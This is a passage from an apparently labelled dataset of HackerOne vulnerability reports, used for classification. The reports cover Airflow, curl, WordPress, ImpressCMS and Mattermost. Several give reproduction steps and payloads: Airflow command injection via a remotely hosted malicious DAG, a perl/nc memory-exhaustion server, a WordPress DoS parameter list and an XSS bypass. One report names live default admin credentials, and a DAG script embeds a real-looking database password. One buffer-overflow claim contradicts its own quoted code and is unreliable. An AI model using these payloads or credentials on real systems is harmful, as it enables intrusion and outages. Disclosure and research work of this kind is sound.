occur.\n{F2216003}\n\n## Impact\n\nDouble-free", "source": "hackerone", "timestamp": "2023-03-20", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "465c6f9cb415a85b3910", "text": "[Incorrect Authorization] Incorrect Authorization Checks in /include/findusers.php\n\n## Summary:\nThe vulnerability is located in the `/include/findusers.php` script:\n\n```\n16.\tinclude \"../mainfile.php\";\n17.\txoops_header(false);\n18.\t\n19.\t$denied = true;\n20.\tif (!empty($_REQUEST['token'])) {\n21.\t\tif (icms::$security->validateToken($_REQUEST['token'], false)) {\n22.\t\t\t$denied = false;\n23.\t\t}\n24.\t} elseif (is_object(icms::$user) && icms::$user->isAdmin()) {\n25.\t\t$denied = false;\n26.\t}\n27.\tif ($denied) {\n28.\t\ticms_core_Message::error(_NOPERM);\n29.\t\texit();\n30.\t}\n```\n\nAs far as I can see, I believe this script should be accessible by admin users only (due to line 24). However, because of the if statements at lines 20-23, this script could be accessed by unauthenticated attackers if they will provide a valid security token. Such a token will be generated in several places within the application (just search for the string `icms::$security->getTokenHTML()`), and some of them do not require the user to be authenticated, like in `misc.php` at [line 181](https://github.com/ImpressCMS/impresscms/blob/48af29c6b8150fbf4220bb5cc4f3c57bcd818384/misc.php#L181).\n\n\n\n## ImpressCMS branch :\nThe vulnerability has been tested and confirmed on ImpressCMS version 1.4.2 (the latest at the time of writing).\n\n## Steps To Reproduce:\n 1. Try to access the `/include/findusers.php` script without being logged into the application\n 1. You will see an error message saying **\"Sorry, you don't have permission to access this area.\"**\n 1. Go to `/misc.php?action=showpopups&type=friend` and look at the HTML source code, search the string `XOOPS_TOKEN_REQUEST` and copy the value of the token\n 1. Go to `/include/findusers.php?token=[TOKEN_VALUE]` and you will be able to access the script and e.g. search through the registered users\n\n## Impact\n\nThis vulnerability might allow unauthenticated attackers to access an otherwise restricted functionality of the application, which in turn might allow an information disclosure about the CMS users (specifically, only the username and real name will be disclosed).", "source": "hackerone", "timestamp": "2022-03-22", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "c29c0891b92cd94fa42d", "text": "[Improper Restriction of Authentication Attempts] Uninstalling Mattermost Launcher for Windows (64-bit), then reinstalling keeps you logged in without authentication\n\nHello Team,\n\nHope you are doing great and enjoying a lot. \nThis issue affected me directly and I was very amazed by it, so I felt it was important to report it in case it was not known. It is resulting unintended behavior:\n\nIn addition to this report is very similar to both of already been Resolved hackerone reports\nhttps://hackerone.com/reports/238260\nhttps://hackerone.com/reports/1278261\n\nSteps to reproduce:\n1) Install The Mattermost Desktop App for Windows (64-bit).\n2) Enter the Display name with Server URL\n3) Login to Mattermost Desktop App\n4) Uninstall Mattermost Desktop App\n5) Reinstall Mattermost Desktop App\n\nConclusion: You will automatically be logged back in to your account, even though you uninstalled Mattermost Desktop App from your computer and did not enter a username/password to login to the fresh Mattermost Desktop App installation.\n\nThanks and have a good day ;)\nRegards\n@annonmous\n\n## Impact\n\nThe Mattermost Desktop App uninstall process is fully automatic, there is no prompt or indication that there is data left behind. I believe it is reasonable to expect that when uninstalling Mattermost Desktop App users session data should have been removed. If I am a user on a shared user account (for example, if I borrowed a computer and I installed Mattermost Desktop App, but uninstalled it later), they can take full control of my account after the fact.\n\nWhen testing this, I could access all of my messages and data, and even access the Mattermost Desktop App admin panel for my team that I am an administrator of.", "source": "hackerone", "timestamp": "2023-01-14", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "61a07748bcc28f4ea974", "text": "[Improper Input Validation] CVE-2023-25692: Apache Airflow Google Provider: Google Cloud Sql Provider Denial Of Service and Remote Command Execution\n\n## 0x01 Environment\n\n- airflow 2.5.1\n- apache-airflow-providers-google 8.8.0\n- Build with docker compose\n\n## 0x02 Reproduction Steps\n### 2.1 Create a malicious Google Cloud SQL Database connection\nCreate the following Google Cloud SQL Database connection named **aaa** under the Admin->Connections menu.Among them, Host, Schema, Login, and Port are required, just fill in the content that conforms to the format.\n\n{F2213508}\nThe actual content filled in **Extra** field is as follows. Note that **sql_proxy_version** must be similar to `?a=`, and the value of **sql_proxy_binary_path** is set to the command to be executed. Fill in 'whoami' here.\n```python\n{\n \"project_id\":\"pivotal-gearing-375804\",\n \"instance\":\"hellopg\",\n \"location\":\"us-central1-b\",\n \"database_type\":\"postgres\",\n \"use_proxy\":\"True\",\n \"use_ssl\":\"False\",\n \"sql_proxy_use_tcp\":\"True\",\n \"sql_proxy_version\":\"?a=\",\n \"sql_proxy_binary_path\":\"whoami\",\n \"sslcert\":\"\",\n \"sslkey\":\"\",\n \"sslrootcert\":\"\"\n}\n```\n\n### 2.2 Use the CloudSQLExecuteQueryOperator operator in the DAG for verification\nCreate a google_test.py script that uses the CloudSQLExecuteQueryOperator operator, and put it in the `/opt/airflow/dags` directory in the background so that it can be automatically loaded by airflow. The content is as follows, where **gcp_cloudsql_conn_id** is set to the connection name we established above **aaa**\n\n```python\nfrom __future__ import annotations\n\nimport os\nimport subprocess\nfrom datetime import datetime\nfrom os.path import expanduser\nfrom urllib.parse import quote_plus\n\nfrom airflow import models\nfrom airflow.providers.google.cloud.operators.cloud_sql import CloudSQLExecuteQueryOperator\n\n\nSQL = [\n \"CREATE TABLE IF NOT EXISTS TABLE_TEST (I INTEGER)\",\n \"CREATE TABLE IF NOT EXISTS TABLE_TEST (I INTEGER)\", # shows warnings logged\n \"INSERT INTO TABLE_TEST VALUES (0)\",\n \"CREATE TABLE IF NOT EXISTS TABLE_TEST2 (I INTEGER)\",\n \"DROP TABLE TABLE_TEST\",\n \"DROP TABLE TABLE_TEST2\",\n]\n\n\npostgres_kwargs = dict(\n user=\"postgres\",\n password=r\"ktd2(%EzQ5\",\n public_port=\"5432\",\n public_ip=\"34.122.52.6\",\n project_id=\"pivotal-gearing-375804\",\n location=\"us-central1-b\",\n instance=\"hellopg\",\n database=\"postgres\",\n client_cert_file=\"key/postgres-client-cert.pem\",\n client_key_file=\".key/postgres-client-key.pem\",\n server_ca_file=\".key/postgres-server-ca.pem\",\n)\n\n\n# Postgres: connect via proxy over TCP\nos.environ[\"AIRFLOW_CONN_PROXY_POSTGRES_TCP\"] = (\n \"gcpcloudsql://{user}:{password}@{public_ip}:{public_port}/{database}?\"\n \"database_type=postgres&\"\n \"project_id={project_id}&\"\n \"location={location}&\"\n \"instance={instance}&\"\n \"use_proxy=True&\"\n \"sql_proxy_use_tcp=True\".format(**postgres_kwargs)\n)\n\nconnection_names = [\n \"proxy_postgres_tcp\",\n]\n\nwith models.DAG(\n dag_id=\"example_gcp_sql_query\",\n start_date=datetime(2021, 1, 1),\n catchup=False,\n tags=[\"example\"],\n) as dag:\n prev_task = None\n\n\n task = CloudSQLExecuteQueryOperator(\n gcp_cloudsql_conn_id=\"aaa\",gcp_conn_id=\"proxy_postgres_tcp\",task_id=\"example_gcp_sql_task_proxy_postgres_tcp\" , sql=SQL\n )\n\n# [END howto_operator_cloudsql_query_operators]\n```\nEnable the** example_gcp_sql_query** DAG corresponding to our **google_test.py** script in the UI management interface, and run.\nClick to view the running graph and logs through the Graph menu.\n{F2213514}\nIt can be seen from the log that the victim machine executed the malicious parameter 'whoami' we constructed.\n{F2213518}\n### 2.3 Other methods for remote command execution through directory traversal\n#### 2.3.1 Construct Malicious DAG\nPlace our malicious dag via Google Cloud Starage at [https://storage.googleapis.com/swordlight/load_my_evil_dag.py](https://storage.googleapis.com/swordlight/load_my_evil_dag.py) .The content is as follows:\n```python\nfrom __future__ import annotations\n\nimport pendulum\n\nfrom airflow import DAG\nfrom airflow.decorator", "source": "hackerone", "timestamp": "2023-04-16", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "ae4e9b1ca95d310e4f32", "text": "[Insufficiently Protected Credentials] Credential leak on redirect\n\n## Summary:\n[add summary of the vulnerability]\n\nCurl can be coaxed to leak user credentials to third-party host by issuing HTTP redirect , like the Proxy-Authorization 、x-auth-token header. It is a bypass of fix https://hackerone.com/reports/1547048 , CVE-2022-27776 .\n\n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n 1. Create a 302.php file, such as:\n```\n\n```\nAdd the 2 record in the /etc/hosts file: \n```\n127.0.0.1 a.com\n127.0.0.1 b.com\n```\n 2. curl -H \"Proxy-Authorization: secrettoken\" http://b.com/302.php -vv -L \nThe redirect will be followed, and the confidential headers sent over insecure HTTP to the specified port:\n```\n# curl -H \"Proxy-Authorization: secrettoken\" http://b.com/302.php -vv -L\n* Trying 127.0.0.1:80...\n* Connected to b.com (127.0.0.1) port 80 (#0)\n> GET /302.php HTTP/1.1\n> Host: b.com\n> User-Agent: curl/7.83.1\n> Accept: */*\n> Proxy-Authorization: secrettoken\n>\n* Mark bundle as not supporting multiuse\n< HTTP/1.1 302 Found\n< Date: Fri, 13 May 2022 11:22:06 GMT\n< Server: Apache/2.4.6 (CentOS) PHP/5.4.16\n< X-Powered-By: PHP/5.4.16\n< Location: http://a.com:8000\n< Content-Length: 0\n< Content-Type: text/html; charset=UTF-8\n<\n* Connection #0 to host b.com left intact\n* Clear auth, redirects to port from 80 to 8000\n* Issue another request to this URL: 'http://a.com:8000/'\n* Trying 127.0.0.1:8000...\n* Connected to a.com (127.0.0.1) port 8000 (#1)\n> GET / HTTP/1.1\n> Host: a.com:8000\n> User-Agent: curl/7.83.1\n> Accept: */*\n> Proxy-Authorization: secrettoken\n>\n```\n 3. curl -H \"x-auth-token: secrettoken\" http://b.com/302.php -vv -L \n```\n# curl -H \"x-auth-token: secrettoken\" http://b.com/302.php -vv -L\n* Trying 127.0.0.1:80...\n* Connected to b.com (127.0.0.1) port 80 (#0)\n> GET /302.php HTTP/1.1\n> Host: b.com\n> User-Agent: curl/7.83.1\n> Accept: */*\n> x-auth-token: secrettoken\n>\n* Mark bundle as not supporting multiuse\n< HTTP/1.1 302 Found\n< Date: Fri, 13 May 2022 11:24:15 GMT\n< Server: Apache/2.4.6 (CentOS) PHP/5.4.16\n< X-Powered-By: PHP/5.4.16\n< Location: http://a.com:8000\n< Content-Length: 0\n< Content-Type: text/html; charset=UTF-8\n<\n* Connection #0 to host b.com left intact\n* Clear auth, redirects to port from 80 to 8000\n* Issue another request to this URL: 'http://a.com:8000/'\n* Trying 127.0.0.1:8000...\n* Connected to a.com (127.0.0.1) port 8000 (#1)\n> GET / HTTP/1.1\n> Host: a.com:8000\n> User-Agent: curl/7.83.1\n> Accept: */*\n> x-auth-token: secrettoken\n```\n\nThe reason for the problem is that curl's filtering of authentication header header is incomplete. The Proxy-Authorization and x-auth-token headers are not considered, only restrict the delivery of Cookies and Authorization.\n\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n * [attachment / reference]\nhttps://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/Proxy-Authorization\n\n## Impact\n\nLeak of Proxy-Authorization and x-auth-token headers.", "source": "hackerone", "timestamp": "2022-05-14", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "99b2c767c7238e6271d6", "text": "[Unknown] CVE-2023-42663: Apache Airflow: Bypass permission verification to view task instances of other dags\n\nApache Airflow, versions before 2.7.2, has a vulnerability that allows an authorized user who has access to read specific DAGs only, to read information about task instances in other DAGs.\n\n#Steps to reproduce :\n1. Copy a User role, name it roleA, and remove the \"can read on DAGs\" \"can delete on DAGs\" \"can edit on DAGs\" permissions.Add \"can read on DAG:tutorial\" permissions\n{F2771458}\n\n2. Create a user named test and assign RoleA to it.\n{F2771447}\n\n3. Log in to the test account, we can only see the DAG named tutorial.Can't see task instances from other DAGs either.\n{F2771449}\n{F2771451}\n\n4. Use burpsuite to send the following message, and you can see the task instances of other DAGs. (replaced with the session of the test account)\n```\nPOST /api/v1/dags/~/dagRuns/~/taskInstances/list HTTP/1.1\nHost: testvul.com:8080\nAccept: application/json\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36\ncontent-type: application/json\nReferer: http://testvul.com:8080/dags/example_external_task_marker_parent/grid\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nCookie: session=3d17f3fe-e02b-4f16-88f1-fd59e299ae0c.a4kyHK7of13T0NtbCVVmPgFtSDU\nConnection: close\nContent-Length: 2\n\n{}\n```\n\n{F2771461}\n\n\n**Security Advisory**: https://lists.apache.org/thread/xj86cvfkxgd0cyqfmz6mh1bsfc61c6o9\n**Severity**: Low\n**Credit**: balis0ng\n\n## Impact\n\nIt allows an authorized user who has access to read specific DAGs only, to read information about task instances in other DAGs.", "source": "hackerone", "timestamp": "2023-11-13", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "dda1074e689253bdb7c1", "text": "[Uncontrolled Resource Consumption] CVE-2018-6389 exploitation - using scripts loader\n\nHi Fastly Team !\n\nUnauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.\nThe vulnerability is registered as CVE-2018-6389.\nWordPress allows users to load multiple JS files and CSS files through load-scripts.php files at once. However, the number and size of files are not restricted in the process of loading JS files, attackers can use this function to deplete server resources and launch denial of service attacks.\n\n**References**\n\nThe vulnerability is registered as https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389 \nhttps://hackerone.com/reports/925425\nhttps://hackerone.com/reports/335177\nhttps://hackerone.com/reports/753491\n\n**Platform(s) Affected: [website]** \n```http\nwww.signalsciences.com/wp-admin/load-scripts.php?load=\n```\n**Steps To Reproduce:**\n\nOpen Vulnerability url - open directory /wp-admin/load-scripts.php?load=\nAdd parameter-vulnerable in request header\nIn request header using GET-Method\n\n**Payloads Vulnerabilities**\n```\neutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter\n```\n{F2237583}\n\n## Impact\n\nAttackers can use this vulnerable function to deplete server resources and launch denial of service attacks.", "source": "hackerone", "timestamp": "2023-04-20", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "6b43fe61bb53d25eb373", "text": "[Cryptographic Issues - Generic] Node 18 reads openssl.cnf from /home/iojs/build/... upon startup on MacOS\n\n> NOTE! Thanks for submitting a report! Please replace *all* the [square] sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report!\n\n**Summary:**\n\nSimilar to https://hackerone.com/reports/1623175 it looks like in Node 18 and later, when it starts \n it attempts to read /home/iojs/build/ws/out/Release/obj.target/deps/openssl/openssl.cnf on MacOS which ordinarily doesn't exist. This is even after the fix for linux.\n\nThe attack would be an attacker with access to a shared MacOS host with a self-chosen username (iojs) being able to affect the OpenSSF configuration of other users. I believe the iojs home directory is something configured within the Node.js build/CI pipeline, as opposed to something internal to OpenSSL.\n\n**Description:**\n\n## Steps To Reproduce:\n\nFrom inspection of the code, look at the path specified in: https://github.com/nodejs/node/blob/7f9cd60eef6fad245baed9896ec6376b693e089a/deps/openssl/openssl.gyp#L24\n\n 'openssl_dir': '<(PRODUCT_DIR_ABS)/obj.target/deps/openssl',\n\nand unlike other platforms, this is not overriden on MacOS in \"/deps/openssl/openssl_common.gypi\"\n\nThis is a similar problem to what was fixed for Linux in https://nodejs.org/en/blog/vulnerability/july-2022-security-releases/#attempt-to-read-openssl-cnf-from-home-iojs-build-upon-startup-medium-cve-2022-32222\n\n## Impact:\n\n openssl.cnf file is being read as part of OpenSSL's initialization; this is used to configure Node.js\n\n## Supporting Material/References:\n\nThis is the suggested fix (also includes removing existing compiler warnings about duplicate OPENSSL definitions)\n\ndiff --git a/deps/openssl/openssl.gyp b/deps/openssl/openssl.gyp\n 2 index 7b1278044e..861bbc5844 100644\n 3 --- a/deps/openssl/openssl.gyp\n 4 +++ b/deps/openssl/openssl.gyp\n 5 @@ -7,21 +7,17 @@\n 6 'conditions': [\n 7 ['OS == \"win\"', {\n 8 'obj_dir_abs': '<(PRODUCT_DIR_ABS)/obj',\n 9 - 'openssl_dir': '<(PRODUCT_DIR_ABS)/obj/lib',\n 10 }],\n 11 ['GENERATOR == \"ninja\"', {\n 12 'obj_dir_abs': '<(PRODUCT_DIR_ABS)/obj',\n 13 'modules_dir': '<(PRODUCT_DIR_ABS)/obj/lib/openssl-modules',\n 14 - 'openssl_dir': '<(PRODUCT_DIR_ABS)/obj/lib',\n 15 }, {\n 16 'obj_dir_abs%': '<(PRODUCT_DIR_ABS)/obj.target',\n 17 'modules_dir': '<(PRODUCT_DIR_ABS)/obj.target/deps/openssl/lib/openssl-modules',\n 18 - 'openssl_dir': '<(PRODUCT_DIR_ABS)/obj.target/deps/openssl',\n 19 }],\n 20 ['OS==\"mac\"', {\n 21 'obj_dir_abs%': '<(PRODUCT_DIR_ABS)/obj.target',\n 22 'modules_dir': '<(PRODUCT_DIR_ABS)/obj.target/deps/openssl/lib/openssl-modules',\n 23 - 'openssl_dir': '<(PRODUCT_DIR_ABS)/obj.target/deps/openssl',\n 24 }],\n 25 ],\n 26 },\n 27 @@ -57,7 +53,6 @@\n 28 ['node_shared_openssl==\"false\"', {\n 29 'defines': [\n 30 'MODULESDIR=\"<(modules_dir)\"',\n 31 - 'OPENSSLDIR=\"<(openssl_dir)\"',\n 32 ]\n 33 }],\n 34 ],\n 35 diff --git a/deps/openssl/openssl_common.gypi b/deps/openssl/openssl_common.gypi\n 36 index d4e39e8416..256eb7d180 100644\n 37 --- a/deps/openssl/openssl_common.gypi\n 38 +++ b/deps/openssl/openssl_common.gypi\n 39 @@ -49,6 +49,7 @@\n 40 'WARNING_CFLAGS': ['-Wno-missing-field-initializers']\n 41 },\n 42 'defines': [\n 43 + 'OPENSSLDIR=\"/System/Library/OpenSSL/\"',\n 44 'ENGINESDIR=\"/dev/null\"',\n 45 ],\n 46 }, 'OS==\"solaris\"', {\n\n## Impact\n\nThe openssl.cnf file contains security configuration information for OpenSSL. It's possible that changing things like default ciphers could affect the security of an application using it.", "source": "hackerone", "timestamp": "2022-10-26", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "bada631f1fd73db280cf", "text": "[Cross-site Scripting (XSS) - Reflected] Bypass of #2035332 RXSS at image.hackerone.live via the `url` parameter\n\nHeyy there,\nI was able to bypass the fix for the reflected xss reported in #2035332\n\nAfter the bug patch, the server now validates the `Content-Type` of the requested resource. The check is done by making a `HEAD` based request to the resource to get the `Content-Type` then if it corresponds to a valid image mime type a second request is made this time `GET` based to retrieve the page resource content.\n\nDue to the HEAD based check it's very easy to bypass this check, just need to modify the server to response with a different `Content-Type` in case of GET and HEAD request\n\nExample code:\n\n```php\n\n```\n\nTOCTOU ( time-of-check to time-of-use) : At the time of check the application relies upon HEAD request but at the time of use relies upon GET request this allows the attacker to bypass the protection.\n\n\nThis xss works only in the Safari browser , I was able to find the problem why it doesn't works in other browser. It had do something with the `Accept` header.\n\nOther browsers send the Accept header with these values: \n\n```\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\n```\nThe server applies sanitization if the Accept header is similar to above, in case of Safari it does something wierd (I don;t actually have a mac so not sure what's eactly it's sending in the Accept header)\nBut the server doesn;t does any sanitization if the header value is like this\n\n```\nAccept: */*\n```\n\n---------------------------------\n\n\n**Steps to reproduce:**\n\n1.Save this code in your webserver xss.php\n\n```php\n\n```\n2.Then input your host in the url parameter: https://image.hackerone.live:8443/resource/md/get/url?url=http://yourhost/ss.php\n3.Open this url in Safari browser and you should get the xss\n{F2593672}\n\n\n---------------------------------\n\n## Impact\n\nAs the server is behind cloudflare I can;t directly make a request to the AWS metadata endpoint, but for the least I can confirm the xss with the provided poc\n\nThankyou\nRegards\nSudhanshu", "source": "hackerone", "timestamp": "2023-08-22", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "bbc1f2f72db9be820c6a", "text": "[Unknown] Default Admin Username and Password on remedysso.mtncameroon.net\n\n## Summary:\nA Remedy Single Sign-On (Remedy SSO) Server is running at https://remedysso.mtncameroon.net/rsso/admin/#/. \nIt is possible to access the application is using the default Administrator credentials.\n\n## Steps To Reproduce:\nGo to https://remedysso.mtncameroon.net/rsso/admin/#/ and login with credentials:\n- Username: Admin\n- Password: RSSO#Admin#\n\n## Remediation\nChange the password of the Admin user or disable the account.\n\n## References\nhttps://cwe.mitre.org/data/definitions/521.html\n\n## Impact\n\nA MNT Group Single Sign-On application was misconfigured in a manner that may have allowed a malicious user to login with the administrator user. The user is capable to perform any kind of configuration of the SSO system and retrieve sensitive information about organization users and infrastructure.", "source": "hackerone", "timestamp": "2022-09-01", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "ee397200ec473597e90c", "text": "[Privilege Escalation] Subdomain Takeover at https://new.rubyonrails.org/\n\n## Disclaimer\n\nI know it's OOS but the issue is pretty serious because of the attractive domain name \"new.rubyonrails.org\" basically anyone could have put malware there.\n\n## Summary\nHi!\n\nI discovered that new.rubyonrails.org was pointing to an unclaimed Github Page, making it vulnerable to subdomain takeover.\nI've managed to claim it in my Github-account and added a simple html file as POC:\n\n{F1548667}\n\n`https://new.rubyonrails.org`\n\n## Mitigation\n- Remove the DNS record\n\nBest regards,\nnagli\n\n## Impact\n\nSubdomain takeovers can be used for\n- Cookies set to the root domain will be shared with this subdomain and can be obtained\n- Stored XSS (arbitrary javascript code can be executed in a users browser)\n- Phishing\n- Hosting malicious content", "source": "hackerone", "timestamp": "2022-03-03", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "2561d3c72fca0ca2b8eb", "text": "[Allocation of Resources Without Limits or Throttling] CVE-2022-32206: HTTP compression denial of service\n\n## Summary:\nCurl does not prevent resource consumption when processing certain header types, but keeps on allocating more and more resources until the application terminates (or the system crashes, see below).\n\nThe attack vectors include (at least):\n- Sending many `Transfer-Encoding`with repeated encodings such as \"gzip,gzip,gzip,...\"\n- if `CURLOPT_ACCEPT_ENCODING` is set sending many `Content-Encoding` with repeated encodings such as \"gzip,gzip,gzip,...\"\n- Sending many `Set-Cookie` with unique cookie names and about 4kbyte value\n\n## Steps To Reproduce:\n 1.Run the following HTTP server:\n `perl -e 'print \"HTTP/1.1 200 OK\\r\\n\";for (my $i=0; $i < 10000000; $i++) { printf \"Transfer-Encoding: \" . \"gzip,\" x 20000 . \"\\r\\n\"; }' | nc -v -l -p 9999`\n 2. `curl http://localhost:9999`\n\nThe application will terminate when it runs out of memory.\n\nOn macOS the app dies due to OOM:\n```\nKilled: 9\n$ echo $?\n137\n```\n\nOn linux it's the same:\n```\nKilled\n$ echo $?\n137\n```\n\nWhen targeting Windows 11 system the system would stop responding. Once the attack script was terminated the system would not recover after 10 minutes of waiting. While it was possible to log on to the system the display would remain black. Rebooting the system was necessary to recover the system to a working state. This of course is likely due to bugs in the Windows operating system or drivers.\n\nOn other platforms nasty effects may also occur, such as causing extreme swapping or a system crash. Depending on how the system handles the application gobbling all memory it may result in collateral damage, for example when kernel attempts to release system resources by killing processes.\n\n## Impact\n\n- Uncontrolled resource consumption\n- Uncontrolled application termination\n- System crash (on some platforms)", "source": "hackerone", "timestamp": "2022-06-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "21ee412664a808f44310", "text": "[Uncontrolled Resource Consumption] CVE-2022-27781: CERTINFO never-ending busy-loop\n\nPublished Advisory: https://curl.se/docs/CVE-2022-27781.html\n\nOriginal Report: https://hackerone.com/reports/1555441\n\n## Impact\n\nDue to an erroneous function, a malicious server could make libcurl built with NSS get stuck in a never-ending busy-loop when trying to retrieve that information.", "source": "hackerone", "timestamp": "2022-07-24", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "62edec84f4b838729711", "text": "[Classic Buffer Overflow] Buffer overflow and affected url:-https://github.com/curl/curl/blob/master/docs/examples/hsts-preload.c\n\n## Summary:\nA buffer overflow, also known as a buffer overrun, occurs when a program or process attempts to write more data to a buffer than the buffer is allocated to hold. This can happen if the program does not properly check the length of the data before writing it to the buffer, or if the program allocates too little space for the buffer.\n\n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n1. The hstsread function in the provided code does not properly check the length of the host string before copying it into the e->name buffer. This could lead to a buffer overflow, allowing an attacker to inject arbitrary code into the application.this could exploited by a malicious domain or website whose url should be long enough to overflow buffer as it's using strcpy function \nCondition a malicious preload host is required to exploit this if it's meet government can use it for zero click attack\n\nRecommendation:\n\nThe hstsread function should be modified to check the length of the host string before copying it into the e->name buffer. If the string is too long, the function should return an error code\n\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n * [attachment / reference]\n\nAffected url:-https://github.com/curl/curl/blob/master/docs/examples/hsts-preload.c\nHere is the vulnerable code if attacker or government manipulate developer to add a very long domain name in hsts_preload then this will result remote code execution \n\n\n\n#include \n#include \n#include \n\nstruct entry {\n const char *name;\n const char *exp;\n};\n\nstatic const struct entry preload_hosts[] = {\n { \"example.com\", \"20370320 01:02:03\" },\n { \"curl.se\", \"20370320 03:02:01\" },\n { NULL, NULL } /* end of list marker */\n};\n\nstruct state {\n int index;\n};\n\n/* \"read\" is from the point of the library, it wants data from us. One domain\n entry per invoke. */\nstatic CURLSTScode hstsread(CURL *easy, struct curl_hstsentry *e,\n void *userp)\n{\n const char *host;\n const char *expire;\n struct state *s = (struct state *)userp;\n (void)easy;\n host = preload_hosts[s->index].name;\n expire = preload_hosts[s->index++].exp;\n\n if(host && (strlen(host) < e->namelen)) {\n strcpy(e->name, host);\n e->includeSubDomains = 0;\n strcpy(e->expire, expire);\n fprintf(stderr, \"HSTS preload '%s' until '%s'\\n\", host, expire);\n }\n else\n return CURLSTS_DONE;\n return CURLSTS_OK;\n}\n\nstatic CURLSTScode hstswrite(CURL *easy, struct curl_hstsentry *e,\n struct curl_index *i, void *userp)\n{\n (void)easy;\n (void)userp; /* we have no custom input */\n printf(\"[%u/%u] %s %s\\n\", (unsigned int)i->index, (unsigned int)i->total,\n e->name, e->expire);\n return CURLSTS_OK;\n}\n\nint main(void)\n{\n CURL *curl;\n CURLcode res;\n\n curl = curl_easy_init();\n if(curl) {\n struct state st = {0};\n\n /* enable HSTS for this handle */\n curl_easy_setopt(curl, CURLOPT_HSTS_CTRL, (long)CURLHSTS_ENABLE);\n\n /* function to call at first to populate the cache before the transfer */\n curl_easy_setopt(curl, CURLOPT_HSTSREADFUNCTION, hstsread);\n curl_easy_setopt(curl, CURLOPT_HSTSREADDATA, &st);\n\n /* function to call after transfer to store the new state of the HSTS\n cache */\n curl_easy_setopt(curl, CURLOPT_HSTSWRITEFUNCTION, hstswrite);\n curl_easy_setopt(curl, CURLOPT_HSTSWRITEDATA, NULL);\n\n /* use the domain with HTTP but due to the preload, it should do the\n transfer using HTTPS */\n curl_easy_setopt(curl, CURLOPT_URL, \"http://curl.se\");\n\n curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);\n\n /* Perform the request, res will get the return code */\n res = curl_easy_perform(curl);\n /* Check for errors */\n if(res != CURLE_OK)\n fprintf(stderr, \"curl_easy_perform() failed: %s\\n\",\n curl_easy_strerror(res));\n\n /* always cleanup */\n curl_easy_cleanup(c", "source": "hackerone", "timestamp": "2023-11-15", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "5962625ba002a6daf113", "text": "[Cross-site 